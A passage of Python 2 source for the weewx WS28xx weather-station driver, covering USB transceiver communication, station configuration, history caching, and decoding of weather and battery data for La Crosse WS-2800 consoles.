readConfigFlash serial number and DevID
rcfi  000: dc 0a 01 f9 01 02 0a 0c 0c 01  2e ff ff ff ff ff ff ff ff ff
transceiver ID: 302 (0x012e)
transceiver serial: 01021012120146

Program Logic

The RF communication thread uses the following logic to communicate with the
weather station console:

Step 1.  Perform in a while loop getState commands until state 0xde16
         is received.

Step 2.  Perform a getFrame command to read the message data.

Step 3.  Handle the contents of the message. The type of message depends on
         the response type:

  Response type (hex):
  20: WS SetTime / SetConfig - Data written
      confirmation the setTime/setConfig setFrame message has been received
      by the console
  40: GetConfig
      save the contents of the configuration for later use (i.e. a setConfig
      message with one or more parameters changed)
  60: Current Weather
      handle the weather data of the current weather message
  80: Actual / Outstanding History
      ignore the data of the actual history record when there is no data gap;
      handle the data of a (one) requested history record (note: in step 4 we
      can decide to request another history record).
  a1: Request First-Time Config
      prepare a setFrame first time message
  a2: Request SetConfig
      prepare a setFrame setConfig message
  a3: Request SetTime
      prepare a setFrame setTime message

Step 4.  When the message received in step 3 is not the one you asked for
         (see step 5 for how to request a certain type of message), decide
         whether to ignore or handle the received message. Then go to step 5
         to request a certain type of message, unless the received message
         has response type a1, a2 or a3; in that case first prepare the
         setFrame message the wireless console asked for.

Step 5.  Decide what kind of message you want to receive next time. The
         request is done via a setFrame message (see step 6).  It is
         not guaranteed that you will receive that kind of message the next
         time but setting the proper timing parameters of firstSleep and
         nextSleep increase the chance you will get the requested type of
         message.

Step 6. The action parameter in the setFrame message sets the type of the
        next to receive message.

  Action (hex):
  00: rtGetHistory - Ask for History message
                     setSleep(0.300,0.010)
  01: rtSetTime    - Ask for Send Time to weather station message
                     setSleep(0.085,0.005)
  02: rtSetConfig  - Ask for Send Config to weather station message
                     setSleep(0.300,0.010)
  03: rtGetConfig  - Ask for Config message
                     setSleep(0.400,0.400)
  05: rtGetCurrent - Ask for Current Weather message
                     setSleep(0.300,0.010)
  c0: Send Time    - Send Time to WS
                     setSleep(0.085,0.005)
  40: Send Config  - Send Config to WS
                     setSleep(0.085,0.005)

  Note: after the Request First-Time Config message (response type = 0xa1)
        perform a rtGetConfig with setSleep(0.085,0.005)

Step 7. Perform a setTX command

Step 8. Go to step 1 to wait for state 0xde16 again.

"""

# TODO: how often is currdat.lst modified with/without hi-speed mode?
# TODO: thread locking around observation data
# TODO: eliminate polling, make MainThread get data as soon as RFThread updates
# TODO: get rid of Length/Buffer construct, replace with a Buffer class or obj

# FIXME: the history retrieval assumes a constant archive interval across all
#        history records.  this means anything that modifies the archive
#        interval should clear the history.

from datetime import datetime

import StringIO
import sys
import syslog
import threading
import time
import traceback
import usb

import weewx.drivers
import weewx.wxformulas
import weeutil.weeutil

DRIVER_NAME = 'WS28xx'
DRIVER_VERSION = '0.33'


def loader(config_dict, engine):
    """Build the driver from the [WS28xx] config section; engine is unused."""
    stn_dict = config_dict[DRIVER_NAME]
    return WS28xxDriver(**stn_dict)

def configurator_loader(config_dict):
    """Return the command-line configurator; config_dict is unused here."""
    return WS28xxConfigurator()

def confeditor_loader():
    """Return the configuration editor used during driver setup."""
    return WS28xxConfEditor()


# flags for enabling/disabling debug verbosity
DEBUG_COMM = 0
DEBUG_CONFIG_DATA = 0
DEBUG_WEATHER_DATA = 0
DEBUG_HISTORY_DATA = 0
DEBUG_DUMP_FORMAT = 'auto'

def logmsg(dst, msg):
    """Emit msg to syslog at priority dst, tagged with the driver name and
    the current thread name (distinguishes RF-thread from main-thread logs)."""
    syslog.syslog(dst, 'ws28xx: %s: %s' %
                  (threading.currentThread().getName(), msg))

def logdbg(msg):
    """Log msg at syslog DEBUG priority."""
    logmsg(syslog.LOG_DEBUG, msg)

def loginf(msg):
    """Log msg at syslog INFO priority."""
    logmsg(syslog.LOG_INFO, msg)

def logcrt(msg):
    """Log msg at syslog CRIT priority."""
    logmsg(syslog.LOG_CRIT, msg)

def logerr(msg):
    """Log msg at syslog ERR priority."""
    logmsg(syslog.LOG_ERR, msg)

def log_traceback(dst=syslog.LOG_INFO, prefix='**** '):
    """Write the active exception's traceback to the log, one line per call."""
    buf = StringIO.StringIO()
    traceback.print_exc(file=buf)
    buf.seek(0)
    for tb_line in buf:
        logmsg(dst, prefix + tb_line)

def log_frame(n, buf):
    """Dump the first n bytes of buf to the debug log, 16 hex bytes per line."""
    logdbg('frame length is %d' % n)
    for chunk_start in xrange(0, n, 16):
        chunk_end = min(chunk_start + 16, n)
        logdbg(''.join('%02x ' % buf[i]
                       for i in xrange(chunk_start, chunk_end)))

def get_datum_diff(v, np, ofl):
    """Return v, or None if v is within 0.001 of either sentinel value.

    np is the station's 'no data' sentinel and ofl its overflow sentinel;
    a reading that (nearly) matches either is treated as missing.
    """
    for sentinel in (np, ofl):
        if abs(sentinel - v) < 0.001:
            return None
    return v

def get_datum_match(v, np, ofl):
    """Return v, or None if v exactly equals the 'no data' or overflow sentinel."""
    return None if v in (np, ofl) else v

def calc_checksum(buf, start, end=None):
    """Sum the bytes buf[0][start:start+end].

    buf is the usual [list-of-ints] wrapper used throughout this driver.
    When end is None, sum from start through the end of the buffer.
    """
    if end is None:
        end = len(buf[0]) - start
    total = 0
    pos = start
    limit = start + end
    while pos < limit:
        total += buf[0][pos]
        pos += 1
    return total

def get_next_index(idx):
    """Return the history index following idx, wrapping via get_index."""
    return get_index(idx + 1)

def get_index(idx):
    """Wrap a history index into the ring-buffer range [0, max_records)."""
    n = WS28xxDriver.max_records
    if idx < 0:
        return idx + n
    if idx >= n:
        return idx - n
    return idx

def tstr_to_ts(tstr):
    """Convert a 'YYYY-mm-dd HH:MM:SS' local-time string to epoch seconds.

    Returns None if tstr is not a string or does not match the format.
    """
    try:
        time_tuple = time.strptime(tstr, "%Y-%m-%d %H:%M:%S")
        return int(time.mktime(time_tuple))
    except (OverflowError, ValueError, TypeError):
        return None

def bytes_to_addr(a, b, c):
    """Pack three bytes into a 20-bit address: low nibble of a, then b, then c."""
    return ((a & 0xF) << 16) | (b << 8) | c

def addr_to_index(addr):
    """Map a flash memory address to a history record index.

    History records are 18 bytes each, starting at address 416 (the
    inverse of index_to_addr).  Floor division is used explicitly so the
    result stays an int under Python 3 or a future-division import;
    behavior is identical to the old '/' under Python 2 ints.
    """
    return (addr - 416) // 18

def index_to_addr(idx):
    """Map a history record index to its flash address (inverse of addr_to_index)."""
    return 416 + idx * 18

def print_dict(data):
    for x in sorted(data.keys()):
        if x == 'dateTime':
            print '%s: %s' % (x, weeutil.weeutil.timestamp_to_string(data[x]))
        else:
            print '%s: %s' % (x, data[x])


class WS28xxConfEditor(weewx.drivers.AbstractConfEditor):
    """Supplies the default [WS28xx] stanza and interactive setup prompts."""

    @property
    def default_stanza(self):
        """Default configuration text for the [WS28xx] section.

        Returned verbatim; do not reformat this string.
        """
        return """
[WS28xx]
    # This section is for the La Crosse WS-2800 series of weather stations.

    # Radio frequency to use between USB transceiver and console: US or EU
    # US uses 915 MHz, EU uses 868.3 MHz.  Default is US.
    transceiver_frequency = US

    # The station model, e.g., 'LaCrosse C86234' or 'TFA Primus'
    model = LaCrosse WS28xx

    # The driver to use:
    driver = weewx.drivers.ws28xx
"""

    def prompt_for_settings(self):
        """Ask the user which radio band to use; return the option dict."""
        print "Specify the frequency used between the station and the"
        print "transceiver, either 'US' (915 MHz) or 'EU' (868.3 MHz)."
        freq = self._prompt('frequency', 'US', ['US', 'EU'])
        return {'transceiver_frequency': freq}


class WS28xxConfigurator(weewx.drivers.AbstractConfigurator):
    """Command-line station utility: dispatches the parsed options to the
    matching station operation (check transceiver, pair, show info/current/
    history, set interval)."""

    def add_options(self, parser):
        """Register this driver's command-line options on the option parser."""
        super(WS28xxConfigurator, self).add_options(parser)
        parser.add_option("--check-transceiver", dest="check",
                          action="store_true",
                          help="check USB transceiver")
        parser.add_option("--pair", dest="pair", action="store_true",
                          help="pair the USB transceiver with station console")
        parser.add_option("--info", dest="info", action="store_true",
                          help="display weather station configuration")
        parser.add_option("--set-interval", dest="interval",
                          type=int, metavar="N",
                          help="set logging interval to N minutes")
        parser.add_option("--current", dest="current", action="store_true",
                          help="get the current weather conditions")
        parser.add_option("--history", dest="nrecords", type=int, metavar="N",
                          help="display N history records")
        parser.add_option("--history-since", dest="recmin",
                          type=int, metavar="N",
                          help="display history records since N minutes ago")
        parser.add_option("--maxtries", dest="maxtries", type=int,
                          help="maximum number of retries, 0 indicates no max")

    def do_options(self, options, parser, config_dict, prompt):
        """Create the driver, run the single requested action, then close it."""
        # default to 3 attempts unless --maxtries was given (0 means no limit)
        maxtries = 3 if options.maxtries is None else int(options.maxtries)
        self.station = WS28xxDriver(**config_dict[DRIVER_NAME])
        if options.check:
            self.check_transceiver(maxtries)
        elif options.pair:
            self.pair(maxtries)
        elif options.interval is not None:
            self.set_interval(maxtries, options.interval, prompt)
        elif options.current:
            self.show_current(maxtries)
        elif options.nrecords is not None:
            self.show_history(maxtries, count=options.nrecords)
        elif options.recmin is not None:
            ts = int(time.time()) - options.recmin * 60
            self.show_history(maxtries, ts=ts)
        else:
            self.show_info(maxtries)
        self.station.closePort()

    def check_transceiver(self, maxtries):
        """See if the transceiver is installed and operational."""
        print 'Checking for transceiver...'
        ntries = 0
        while ntries < maxtries:
            ntries += 1
            if self.station.transceiver_is_present():
                print 'Transceiver is present'
                sn = self.station.get_transceiver_serial()
                print 'serial: %s' % sn
                tid = self.station.get_transceiver_id()
                print 'id: %d (0x%04x)' % (tid, tid)
                break
            print 'Not found (attempt %d of %d) ...' % (ntries, maxtries)
            time.sleep(5)
        else:
            # while/else: only reached when the retries were exhausted
            # without the break above firing
            print 'Transceiver not responding.'

    def pair(self, maxtries):
        """Pair the transceiver with the station console."""
        print 'Pairing transceiver with console...'
        maxwait = 90 # how long to wait between button presses, in seconds
        ntries = 0
        while ntries < maxtries or maxtries == 0:
            if self.station.transceiver_is_paired():
                print 'Transceiver is paired to console'
                break
            ntries += 1
            msg = 'Press and hold the [v] key until "PC" appears'
            if maxtries > 0:
                msg += ' (attempt %d of %d)' % (ntries, maxtries)
            else:
                msg += ' (attempt %d)' % ntries
            print msg
            # poll every 5 seconds for up to maxwait seconds after the prompt
            now = start_ts = int(time.time())
            while (now - start_ts < maxwait and
                   not self.station.transceiver_is_paired()):
                time.sleep(5)
                now = int(time.time())
        else:
            # retries exhausted without pairing (loop ended without break)
            print 'Transceiver not paired to console.'

    def get_interval(self, maxtries):
        """Return the station archive interval in minutes, or None."""
        cfg = self.get_config(maxtries)
        if cfg is None:
            return None
        # getHistoryInterval is defined elsewhere in this module
        return getHistoryInterval(cfg['history_interval'])

    def get_config(self, maxtries):
        """Poll for the station configuration; maxtries == 0 means retry forever."""
        start_ts = None
        ntries = 0
        while ntries < maxtries or maxtries == 0:
            cfg = self.station.get_config()
            if cfg is not None:
                return cfg
            ntries += 1
            if start_ts is None:
                start_ts = int(time.time())
            else:
                dur = int(time.time()) - start_ts
                print 'No data after %d seconds (press SET to sync)' % dur
            time.sleep(30)
        return None

    def set_interval(self, maxtries, interval, prompt):
        """Set the station archive interval"""
        print "This feature is not yet implemented"

    def show_info(self, maxtries):
        """Query the station then display the settings."""
        print 'Querying the station for the configuration...'
        cfg = self.get_config(maxtries)
        if cfg is not None:
            print_dict(cfg)

    def show_current(self, maxtries):
        """Get current weather observation."""
        print 'Querying the station for current weather data...'
        start_ts = None
        ntries = 0
        while ntries < maxtries or maxtries == 0:
            packet = self.station.get_observation()
            if packet is not None:
                print_dict(packet)
                break
            ntries += 1
            if start_ts is None:
                start_ts = int(time.time())
            else:
                dur = int(time.time()) - start_ts
                print 'No data after %d seconds (press SET to sync)' % dur
            time.sleep(30)

    def show_history(self, maxtries, ts=0, count=0):
        """Display the indicated number of records or the records since the 
        specified timestamp (local time, in seconds)"""
        print "Querying the station for historical records..."
        ntries = 0
        last_n = nrem = None
        last_ts = int(time.time())
        self.station.start_caching_history(since_ts=ts, num_rec=count)
        while nrem is None or nrem > 0:
            if ntries >= maxtries:
                print 'Giving up after %d tries' % ntries
                break
            time.sleep(30)
            ntries += 1
            now = int(time.time())
            n = self.station.get_num_history_scanned()
            if n == last_n:
                # no progress since the last poll
                dur = now - last_ts
                print 'No data after %d seconds (press SET to sync)' % dur
            else:
                # progress was made; reset the retry counter
                ntries = 0
                last_ts = now
            last_n = n
            nrem = self.station.get_uncached_history_count()
            ni = self.station.get_next_history_index()
            li = self.station.get_latest_history_index()
            msg = "  scanned %s records: current=%s latest=%s remaining=%s\r" % (n, ni, li, nrem)
            sys.stdout.write(msg)
            sys.stdout.flush()
        self.station.stop_caching_history()
        records = self.station.get_history_cache_records()
        self.station.clear_history_cache()
        print
        print 'Found %d records' % len(records)
        for r in records:
            print r


class WS28xxDriver(weewx.drivers.AbstractDevice):
    """Driver for LaCrosse WS28xx stations."""

    # number of records in the station's circular history buffer
    # (used by get_index for ring-buffer wrapping)
    max_records = 1797

    def __init__(self, **stn_dict) :
        """Initialize the station object.

        model: Which station model is this?
        [Optional. Default is 'LaCrosse WS28xx']

        transceiver_frequency: Frequency for transceiver-to-console.  Specify
        either US or EU.
        [Required. Default is US]

        polling_interval: How often to sample the USB interface for data.
        [Optional. Default is 30 seconds]

        comm_interval: Communications mode interval
        [Optional.  Default is 3]

        device_id: The USB device ID for the transceiver.  If there are
        multiple devices with the same vendor and product IDs on the bus,
        each will have a unique device identifier.  Use this identifier
        to indicate which device should be used.
        [Optional. Default is None]

        serial: The transceiver serial number.  If there are multiple
        devices with the same vendor and product IDs on the bus, each will
        have a unique serial number.  Use the serial number to indicate which
        transceiver should be used.
        [Optional. Default is None]
        """

        self.model            = stn_dict.get('model', 'LaCrosse WS28xx')
        self.polling_interval = int(stn_dict.get('polling_interval', 30))
        self.comm_interval    = int(stn_dict.get('comm_interval', 3))
        self.frequency        = stn_dict.get('transceiver_frequency', 'US')
        self.device_id        = stn_dict.get('device_id', None)
        self.serial           = stn_dict.get('serial', None)

        # USB ids passed to the communication service (see startUp)
        self.vendor_id        = 0x6666
        self.product_id       = 0x5555

        now = int(time.time())
        self._service = None
        self._last_rain = None          # last rain total, for delta calculation
        self._last_obs_ts = None        # timestamp of last new observation
        self._last_nodata_log_ts = now
        self._nodata_interval = 300 # how often to check for no data
        self._last_contact_log_ts = now
        self._nocontact_interval = 300 # how often to check for no contact
        self._log_interval = 600 # how often to log

        # debug settings may be overridden per-driver in the config
        global DEBUG_COMM
        DEBUG_COMM = int(stn_dict.get('debug_comm', 0))
        global DEBUG_CONFIG_DATA
        DEBUG_CONFIG_DATA = int(stn_dict.get('debug_config_data', 0))
        global DEBUG_WEATHER_DATA
        DEBUG_WEATHER_DATA = int(stn_dict.get('debug_weather_data', 0))
        global DEBUG_HISTORY_DATA
        DEBUG_HISTORY_DATA = int(stn_dict.get('debug_history_data', 0))
        global DEBUG_DUMP_FORMAT
        DEBUG_DUMP_FORMAT = stn_dict.get('debug_dump_format', 'auto')

        loginf('driver version is %s' % DRIVER_VERSION)
        loginf('frequency is %s' % self.frequency)

        # start the RF communication thread immediately
        self.startUp()

    @property
    def hardware_name(self):
        """Return the station model string for display purposes."""
        return self.model

    # this is invoked by StdEngine as it shuts down
    def closePort(self):
        self.shutDown()

    def genLoopPackets(self):
        """Generator function that continuously returns decoded packets."""
        while True:
            now = int(time.time()+0.5)
            packet = self.get_observation()
            if packet is not None:
                ts = packet['dateTime']
                # only emit an observation if its timestamp has advanced;
                # an unchanged timestamp means no new data from the console
                if self._last_obs_ts is None or self._last_obs_ts != ts:
                    self._last_obs_ts = ts
                    self._last_nodata_log_ts = now
                    self._last_contact_log_ts = now
                else:
                    packet = None

            # if no new weather data, return an empty packet
            if packet is None:
                packet = {'usUnits': weewx.METRIC, 'dateTime': now}
                # if no new weather data for awhile, log it
                if self._last_obs_ts is None or \
                        now - self._last_obs_ts > self._nodata_interval:
                    if now - self._last_nodata_log_ts > self._log_interval:
                        msg = 'no new weather data'
                        if self._last_obs_ts is not None:
                            msg += ' after %d seconds' % (
                                now - self._last_obs_ts)
                        loginf(msg)
                        self._last_nodata_log_ts = now

            # if no contact with console for awhile, log it
            ts = self.get_last_contact()
            if ts is None or now - ts > self._nocontact_interval:
                if now - self._last_contact_log_ts > self._log_interval:
                    msg = 'no contact with console'
                    if ts is not None:
                        msg += ' after %d seconds' % (now - ts)
                    msg += ': press [SET] to sync'
                    loginf(msg)
                    self._last_contact_log_ts = now

            yield packet
            time.sleep(self.polling_interval)

    def genStartupRecords(self, ts):
        """Yield archive records since timestamp ts, scanned from the console."""
        loginf('Scanning historical records')
        maxtries = 65
        ntries = 0
        last_n = n = nrem = None
        last_ts = now = int(time.time())
        self.start_caching_history(since_ts=ts)
        while nrem is None or nrem > 0:
            if ntries >= maxtries:
                logerr('No historical data after %d tries' % ntries)
                return
            time.sleep(60)
            ntries += 1
            now = int(time.time())
            n = self.get_num_history_scanned()
            if n == last_n:
                # no progress since last poll; nag the user to sync
                dur = now - last_ts
                loginf('No data after %d seconds (press SET to sync)' % dur)
            else:
                # progress was made; reset the retry counter
                ntries = 0
                last_ts = now
            last_n = n
            nrem = self.get_uncached_history_count()
            ni = self.get_next_history_index()
            li = self.get_latest_history_index()
            loginf("Scanned %s records: current=%s latest=%s remaining=%s" %
                   (n, ni, li, nrem))
        self.stop_caching_history()
        records = self.get_history_cache_records()
        self.clear_history_cache()
        loginf('Found %d historical records' % len(records))
        last_ts = None
        for r in records:
            # the interval is derived from consecutive timestamps, so the
            # first record (with no predecessor) is skipped by design
            if last_ts is not None and r['dateTime'] is not None:
                r['usUnits'] = weewx.METRIC
                r['interval'] = (r['dateTime'] - last_ts) / 60
                yield r
            last_ts = r['dateTime']

# FIXME: do not implement hardware record generation until we figure
# out how to query the historical records faster.
#    def genArchiveRecords(self, since_ts):
#        pass

# FIXME: implement retries for this so that rf thread has time to get
# configuration data from the station
#    @property
#    def archive_interval(self):
#        cfg = self.get_config()
#        return getHistoryInterval(cfg['history_interval']) * 60

# FIXME: implement set/get time
#    def setTime(self):
#        pass
#    def getTime(self):
#        pass

    def startUp(self):
        """Create the communication service and start the RF thread (idempotent)."""
        if self._service is not None:
            return
        self._service = CCommunicationService()
        self._service.setup(self.frequency,
                            self.vendor_id, self.product_id, self.device_id,
                            self.serial, comm_interval=self.comm_interval)
        self._service.startRFThread()

    def shutDown(self):
        """Stop the RF thread and release the communication service."""
        self._service.stopRFThread()
        self._service.teardown()
        self._service = None

    def transceiver_is_present(self):
        return self._service.DataStore.getTransceiverPresent()

    def transceiver_is_paired(self):
        return self._service.DataStore.getDeviceRegistered()

    def get_transceiver_serial(self):
        return self._service.DataStore.getTransceiverSerNo()

    def get_transceiver_id(self):
        return self._service.DataStore.getDeviceID()

    def get_last_contact(self):
        """Return the timestamp of the last console contact, or None."""
        return self._service.getLastStat().last_seen_ts

    def get_observation(self):
        """Build a weewx LOOP packet from the latest decoded weather data.

        Returns None when no timestamped data is available yet.  Sentinel
        values ('no data' / overflow) from the station are mapped to None.
        """
        data = self._service.getWeatherData()
        ts = data._timestamp
        if ts is None:
            return None

        # add elements required for weewx LOOP packets
        packet = {}
        packet['usUnits'] = weewx.METRIC
        packet['dateTime'] = ts

        # data from the station sensors
        packet['inTemp']      = get_datum_diff(data._TempIndoor,
                                               CWeatherTraits.TemperatureNP(),
                                               CWeatherTraits.TemperatureOFL())
        packet['inHumidity']  = get_datum_diff(data._HumidityIndoor,
                                               CWeatherTraits.HumidityNP(),
                                               CWeatherTraits.HumidityOFL())
        packet['outTemp']     = get_datum_diff(data._TempOutdoor,
                                               CWeatherTraits.TemperatureNP(),
                                               CWeatherTraits.TemperatureOFL())
        packet['outHumidity'] = get_datum_diff(data._HumidityOutdoor,
                                               CWeatherTraits.HumidityNP(),
                                               CWeatherTraits.HumidityOFL())
        packet['pressure']    = get_datum_diff(data._PressureRelative_hPa,
                                               CWeatherTraits.PressureNP(),
                                               CWeatherTraits.PressureOFL())
        packet['windSpeed']   = get_datum_diff(data._WindSpeed,
                                               CWeatherTraits.WindNP(),
                                               CWeatherTraits.WindOFL())
        packet['windGust']    = get_datum_diff(data._Gust,
                                               CWeatherTraits.WindNP(),
                                               CWeatherTraits.WindOFL())

        packet['windDir'] = getWindDir(data._WindDirection,
                                       packet['windSpeed'])
        packet['windGustDir'] = getWindDir(data._GustDirection,
                                           packet['windGust'])

        # calculated elements not directly reported by station
        packet['rainRate'] = get_datum_match(data._Rain1H,
                                             CWeatherTraits.RainNP(),
                                             CWeatherTraits.RainOFL())
        if packet['rainRate'] is not None:
            packet['rainRate'] /= 10 # weewx wants cm/hr
        rain_total = get_datum_match(data._RainTotal,
                                     CWeatherTraits.RainNP(),
                                     CWeatherTraits.RainOFL())
        # rain since the previous observation, from the running total
        delta = weewx.wxformulas.calculate_rain(rain_total, self._last_rain)
        self._last_rain = rain_total
        packet['rain'] = delta
        if packet['rain'] is not None:
            packet['rain'] /= 10 # weewx wants cm

        # track the signal strength and battery levels
        laststat = self._service.getLastStat()
        packet['rxCheckPercent'] = laststat.LastLinkQuality
        packet['windBatteryStatus'] = getBatteryStatus(
            laststat.LastBatteryStatus, 'wind')
        packet['rainBatteryStatus'] = getBatteryStatus(
            laststat.LastBatteryStatus, 'rain')
        packet['outTempBatteryStatus'] = getBatteryStatus(
            laststat.LastBatteryStatus, 'th')
        packet['inTempBatteryStatus'] = getBatteryStatus(
            laststat.LastBatteryStatus, 'console')

        return packet

    def get_config(self):
        """Return the station configuration dict, or None if not yet valid.

        A missing or zero outgoing checksum means the RF thread has not
        received a complete configuration from the console yet.
        """
        logdbg('get station configuration')
        cfg = self._service.getConfigData().asDict()
        cs = cfg.get('checksum_out')
        if cs is None or cs == 0:
            return None
        return cfg

    def start_caching_history(self, since_ts=0, num_rec=0):
        self._service.startCachingHistory(since_ts, num_rec)

    def stop_caching_history(self):
        self._service.stopCachingHistory()

    def get_uncached_history_count(self):
        return self._service.getUncachedHistoryCount()

    def get_next_history_index(self):
        return self._service.getNextHistoryIndex()

    def get_latest_history_index(self):
        return self._service.getLatestHistoryIndex()

    def get_num_history_scanned(self):
        return self._service.getNumHistoryScanned()

    def get_history_cache_records(self):
        return self._service.getHistoryCacheRecords()

    def clear_history_cache(self):
        self._service.clearHistoryCache()

    def set_interval(self, interval):
        # FIXME: set the archive interval
        pass

# The following classes and methods are adapted from the implementation by
# eddie de pieri, which is in turn based on the HeavyWeather implementation.

class BadResponse(Exception):
    """Raised when unexpected data is found in the frame buffer."""

class DataWritten(Exception):
    """Raised when the message 'data written' appears in the frame buffer."""

class BitHandling:
    """Static helpers for single-bit manipulation of integers."""

    @staticmethod
    def testBit(int_type, offset):
        """Return 2**offset when the bit at 'offset' is one, else 0."""
        return int_type & (1 << offset)

    @staticmethod
    def setBit(int_type, offset):
        """Return int_type with the bit at 'offset' set to 1."""
        return int_type | (1 << offset)

    @staticmethod
    def setBitVal(int_type, offset, val):
        """Return int_type ORed with 'val' shifted up by 'offset'.

        Note this only ORs: a val of 0 does not clear an existing bit.
        """
        return int_type | (val << offset)

    @staticmethod
    def clearBit(int_type, offset):
        """Return int_type with the bit at 'offset' cleared."""
        return int_type & ~(1 << offset)

    @staticmethod
    def toggleBit(int_type, offset):
        """Return int_type with the bit at 'offset' inverted."""
        return int_type ^ (1 << offset)

class EHistoryInterval:
    """Station codes for the history archive interval."""
    hi01Min = 0
    hi05Min = 1
    hi10Min = 2
    hi15Min = 3
    hi20Min = 4
    hi30Min = 5
    hi60Min = 6
    hi02Std = 7
    hi04Std = 8
    hi06Std = 9
    hi08Std = 0xA
    hi12Std = 0xB
    hi24Std = 0xC

class EWindspeedFormat:
    """Display-format codes for wind speed."""
    wfMs = 0
    wfKnots = 1
    wfBFT = 2
    wfKmh = 3
    wfMph = 4

class ERainFormat:
    """Display-format codes for rain."""
    rfMm = 0
    rfInch = 1

class EPressureFormat:
    """Display-format codes for pressure."""
    pfinHg = 0
    pfHPa = 1

class ETemperatureFormat:
    """Display-format codes for temperature."""
    tfFahrenheit = 0
    tfCelsius = 1

class EClockMode:
    """Display-format codes for the clock."""
    ct24H = 0
    ctAmPm = 1

class EWeatherTendency:
    """Station codes for the pressure/weather tendency."""
    TREND_NEUTRAL = 0
    TREND_UP = 1
    TREND_DOWN = 2
    TREND_ERR = 3

class EWeatherState:
    """Station codes for the forecast/weather state."""
    WEATHER_BAD = 0
    WEATHER_NEUTRAL = 1
    WEATHER_GOOD = 2
    WEATHER_ERR = 3

class EWindDirection:
    """Station codes for the 16-point wind rose plus error states."""
    wdN = 0
    wdNNE = 1
    wdNE = 2
    wdENE = 3
    wdE = 4
    wdESE = 5
    wdSE = 6
    wdSSE = 7
    wdS = 8
    wdSSW = 9
    wdSW = 0x0A
    wdWSW = 0x0B
    wdW = 0x0C
    wdWNW = 0x0D
    wdNW = 0x0E
    wdNNW = 0x0F
    wdERR = 0x10
    wdInvalid = 0x11
    wdNone = 0x12

def getWindDir(wdir, wspeed):
    """Convert a 16-point wind-rose index (0-15) to degrees.

    Returns None when there is no wind (speed is None or zero) or the
    index is out of range.  Each index step is 22.5 degrees; float math
    is used so odd indices are not truncated by Python 2 integer
    division (e.g. index 1 must be 22.5, not 22).
    """
    if wspeed is None or wspeed == 0:
        return None
    if wdir < 0 or wdir >= 16:
        return None
    return wdir * 360.0 / 16.0

class EResetMinMaxFlags:
    """Station codes identifying which min/max register to reset."""
    rmTempIndoorHi = 0
    rmTempIndoorLo = 1
    rmTempOutdoorHi = 2
    rmTempOutdoorLo = 3
    rmWindchillHi = 4
    rmWindchillLo = 5
    rmDewpointHi = 6
    rmDewpointLo = 7
    rmHumidityIndoorLo = 8
    rmHumidityIndoorHi = 9
    rmHumidityOutdoorLo = 0x0A
    rmHumidityOutdoorHi = 0x0B
    rmWindspeedHi = 0x0C
    rmWindspeedLo = 0x0D
    rmGustHi = 0x0E
    rmGustLo = 0x0F
    rmPressureLo = 0x10
    rmPressureHi = 0x11
    rmRain1hHi = 0x12
    rmRain24hHi = 0x13
    rmRainLastWeekHi = 0x14
    rmRainLastMonthHi = 0x15
    rmRainTotal = 0x16
    rmInvalid = 0x17

class ERequestType:
    """Kinds of requests the driver can make of the station."""
    rtGetCurrent = 0
    rtGetHistory = 1
    rtGetConfig = 2
    rtSetConfig = 3
    rtSetTime = 4
    rtFirstConfig = 5
    rtINVALID = 6

class EAction:
    """Action codes placed in outgoing frames."""
    aGetHistory = 0
    aReqSetTime = 1
    aReqSetConfig = 2
    aGetConfig = 3
    aGetCurrent = 5
    aSendTime = 0xc0
    aSendConfig = 0x40

class ERequestState:
    """States a pending request moves through."""
    rsQueued = 0
    rsRunning = 1
    rsFinished = 2
    rsPreamble = 3
    rsWaitDevice = 4
    rsWaitConfig = 5
    rsError = 6
    rsChanged = 7
    rsINVALID = 8

class EResponseType:
    """Response-type codes found in incoming frames."""
    rtDataWritten = 0x20
    rtGetConfig = 0x40
    rtGetCurrentWeather = 0x60
    rtGetHistory = 0x80
    rtRequest = 0xa0
    rtReqFirstConfig = 0xa1
    rtReqSetConfig = 0xa2
    rtReqSetTime = 0xa3

# frequency standards and their associated transmission frequencies
# frequency standards and their associated transmission frequencies
class EFrequency:
    """Frequency standard names (fs*) and their frequencies in Hz (tf*)."""
    fsUS = 'US'
    tfUS = 905000000
    fsEU = 'EU'
    tfEU = 868300000

def getFrequency(standard):
    """Return the transmission frequency (Hz) for a standard ('US'/'EU').

    An unrecognized standard is logged and falls back to US.
    """
    table = {EFrequency.fsUS: EFrequency.tfUS,
             EFrequency.fsEU: EFrequency.tfEU}
    if standard in table:
        return table[standard]
    logerr("unknown frequency standard '%s', using US" % standard)
    return EFrequency.tfUS

def getFrequencyStandard(frequency):
    """Return the standard name ('US'/'EU') for a transmission frequency.

    An unrecognized frequency is logged and falls back to US.
    """
    table = {EFrequency.tfUS: EFrequency.fsUS,
             EFrequency.tfEU: EFrequency.fsEU}
    if frequency in table:
        return table[frequency]
    logerr("unknown frequency '%s', using US" % frequency)
    return EFrequency.fsUS

# HWPro presents battery flags as WS/TH/RAIN/WIND
# 0 - wind
# 1 - rain
# 2 - thermo-hygro
# 3 - console

batterybits = {'wind':0, 'rain':1, 'th':2, 'console':3}

def getBatteryStatus(status, flag):
    """Return 1 if the battery bit for 'flag' is set in 'status', 0 if it
    is clear, or None for an unknown flag name."""
    try:
        bit = batterybits[flag]
    except KeyError:
        return None
    return 1 if BitHandling.testBit(status, bit) else 0

# minutes of data per history record, keyed by EHistoryInterval code
history_intervals = {
    EHistoryInterval.hi01Min: 1,
    EHistoryInterval.hi05Min: 5,
    EHistoryInterval.hi10Min: 10,
    EHistoryInterval.hi15Min: 15,  # was missing: hi15Min is a valid code
    EHistoryInterval.hi20Min: 20,
    EHistoryInterval.hi30Min: 30,
    EHistoryInterval.hi60Min: 60,
    EHistoryInterval.hi02Std: 120,
    EHistoryInterval.hi04Std: 240,
    EHistoryInterval.hi06Std: 360,
    EHistoryInterval.hi08Std: 480,
    EHistoryInterval.hi12Std: 720,
    EHistoryInterval.hi24Std: 1440,
    }

def getHistoryInterval(i):
    """Return the number of minutes for history interval code 'i', or
    None for an unknown code."""
    try:
        return history_intervals[i]
    except KeyError:
        return None

# NP - not present
# OFL - outside factory limits
# NP - not present
# OFL - outside factory limits
class CWeatherTraits(object):
    """Constant maps and sentinel values for station readings.

    The *NP methods return the 'not present' sentinel and the *OFL
    methods the 'outside factory limits' sentinel that the USBHardware
    decoders produce for error and overflow nibble patterns.
    """
    # 16-point compass rose; index 15 is NNW (fixed from the typo "NWN",
    # matching EWindDirection.wdNNW == 0x0F). 16..18 are err/inv/none.
    windDirMap = {
        0: "N", 1: "NNE", 2: "NE", 3: "ENE", 4: "E", 5: "ESE", 6: "SE",
